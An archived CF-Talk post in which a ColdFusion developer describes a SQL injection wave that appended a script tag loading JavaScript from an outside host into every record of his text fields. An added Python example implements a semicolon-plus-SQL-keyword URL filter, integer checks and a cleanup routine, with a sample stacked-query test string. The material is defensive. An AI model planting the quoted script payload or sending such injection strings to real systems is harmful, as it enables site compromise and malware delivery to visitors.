>  The attack appends JavaScript to character fields.

Hi.  Just checking in here on SQL injection -- I am a self-taught 
self-employed CF programmer, been doing this for quite a while, but 
there is a ton I don't know.  And I have been hit by this current 
wave of injection.

So, my SQL Server 2005 database doesn't just get one record 
injected.  It's every record in a particular field, all containing 
(in this attack) this code:

script src="http://jjmaoduo.3322.org/csrss/w.js";

and a few more things in HTML I didn't include.



What I have done to protect about 15 CF sites -- is simply require 
that integer values be integers -- by cfincluding a list of params 
like this, from application.cfm:

<!--- Each known numeric parameter is forced to be an integer; a non-integer value fails the CFPARAM --->
<CFIF IsDefined("groupid")>
<CFPARAM NAME="groupid" TYPE="integer">
</CFIF>
<CFIF IsDefined("login")>
<CFPARAM NAME="login" TYPE="integer">
</CFIF>
<CFIF IsDefined("sg")>
<CFPARAM NAME="sg" TYPE="integer">
</CFIF>
<CFIF IsDefined("messageid")>
<CFPARAM NAME="messageid" TYPE="integer">
</CFIF>
<CFIF IsDefined("msg")>
<CFPARAM NAME="msg" TYPE="integer">
</CFIF>


So, this text script has been injected into every record in about 
five fields in my users table -- and also into a variety of other 
tables in the same way: every record in that table, in some selected fields.

All these injected fields are text fields -- URLs, addresses,

Can this be done through a URL?

Does the list of fields that have been injected provide any clue 
about how or where the injection attack occurred?  How do these guys, 
or their program, know my table names and my field names?  I have 
some very obscure field names, and they still get them injected - 
they are not guessing these things, they know the name of the field.

If I wanted to duplicate what they did, I would write a loop that 
would go through every record in the table, and CFUPDATE that 
particular record.  In fact, I wrote scripts like this to remove this 
junk, setting the record back to what it was before the 
injection.  How do they do this?



Anyway, got my hands full.  Any thoughts on this would be great.

And yes, I'd like to see the URL "loop" script that was offered by Justin Scott.

>Actually, with this particular SQL injection attack it's really easy 
>to stop.  We created a SQL filter that is called from 
>application.cfm.  It loops through the URL structure and checks to 
>see if any URL variables contain both a semi-colon and any SQL 
>keyword.  If a match is found, it just cfaborts the request and 
>sends us an e-mail with the details.  We periodically review those 
>messages and have not found a single false-positive yet after 
>deployment to every site we manage.  Granted, it will not stop SQL 
>injection through form posts, but I don't recall ever seeing a SQL 
>injection attack through a form post (yet).  At the least it can put 
>an immediate stop to the current flood and give you time to 
>implement other protective measures such as cfqueryparam, etc.  We 
>have CF5 and CFMX versions if anyone wants a copy.

Bruce Schuman
Santa Barbara CA
http://originresearch.com
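The following is an added example, not code from the original CF-Talk thread or from either poster. It shows, in Python rather than CFML, the two defensive pieces discussed above: the URL filter the quoted reply describes (flag a parameter whose value carries both a semicolon and a SQL keyword) together with the integer typing of the known numeric parameters, and the cleanup loop the poster wrote (strip an appended script tag from every affected text field, returning the list of changes so they can be reviewed before the UPDATEs run). The parameter names come from the CFPARAM list above; the keyword list, the sample requests, the sample rows and the `EXAMPLE.invalid` URL are constructed for illustration.

```python
"""Added example (not from the CF-Talk thread): request filter plus cleanup."""
import re
from urllib.parse import unquote_plus

# Parameters the site treats as integers (the poster's CFPARAM TYPE="integer" list).
INTEGER_PARAMS = {"groupid", "login", "sg", "messageid", "msg"}

# Keywords that, combined with a semicolon in the same value, mark a stacked-query
# attempt. Constructed list; extend it from what the e-mailed reports actually show.
SQL_KEYWORDS = ("declare", "exec", "cast", "select", "insert",
                "update", "delete", "drop", "union")
KEYWORD_RE = re.compile(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)
INTEGER_RE = re.compile(r"^-?\d+$")

# An injected <script ...> tag, with or without its closing </script>.
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>(?:.*?</script>)?", re.IGNORECASE | re.DOTALL)


def parse_query(query_string):
    """Split a raw query string into decoded (name, value) pairs.
    Done by hand so that a ';' inside a value is never treated as a separator."""
    pairs = []
    for part in query_string.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def check_request(query_string):
    """Return (param, reason) findings for a query string; an empty list is clean.
    Numeric params must be integers; every other param is flagged when its value
    holds both a semicolon and a SQL keyword, as in the quoted reply's filter."""
    findings = []
    for name, value in parse_query(query_string):
        if name.lower() in INTEGER_PARAMS:
            if not INTEGER_RE.match(value.strip()):
                findings.append((name, "expected integer"))
        elif ";" in value and KEYWORD_RE.search(value):
            findings.append((name, "semicolon with SQL keyword"))
    return findings


def strip_injected_script(value):
    """Remove appended <script> blocks from one stored field value.
    Returns (cleaned_value, changed); untouched values come back unchanged."""
    cleaned, hits = SCRIPT_TAG_RE.subn("", value)
    if hits:
        cleaned = cleaned.rstrip()
    return cleaned, hits > 0


def clean_rows(rows, fields):
    """Apply strip_injected_script to the named text fields of each row (a dict
    with an 'id' key). Returns (id, field, before, after) tuples so the UPDATE
    statements can be reviewed before they are issued against the live table."""
    changes = []
    for row in rows:
        for field in fields:
            before = row.get(field)
            if isinstance(before, str):
                after, changed = strip_injected_script(before)
                if changed:
                    changes.append((row["id"], field, before, after))
    return changes


if __name__ == "__main__":
    # Constructed requests: clean, a bad integer, and a stacked-query fragment.
    for qs in ("groupid=12&login=7",
               "groupid=12abc",
               "url=http://example.com/x%3BDECLARE+%40s+varchar(10)--"):
        print(qs, "->", check_request(qs) or "ok")

    # Constructed rows standing in for the poster's users table.
    users = [
        {"id": 1, "url": "http://example.com/", "city": "Santa Barbara"},
        {"id": 2, "url": 'http://example.net/<script src="http://EXAMPLE.invalid/w.js"></script>',
         "city": "Goleta"},
    ]
    for change in clean_rows(users, ["url", "city"]):
        print(change)
```

As the quoted reply itself notes, the keyword filter is a stopgap: it sees only URL parameters, not form posts, and it depends on the keyword list matching what is sent. Typing the numeric parameters and passing every value through cfqueryparam removes the injection point rather than pattern-matching on it, which is why the filter is useful for buying time while that work is done.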

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310387
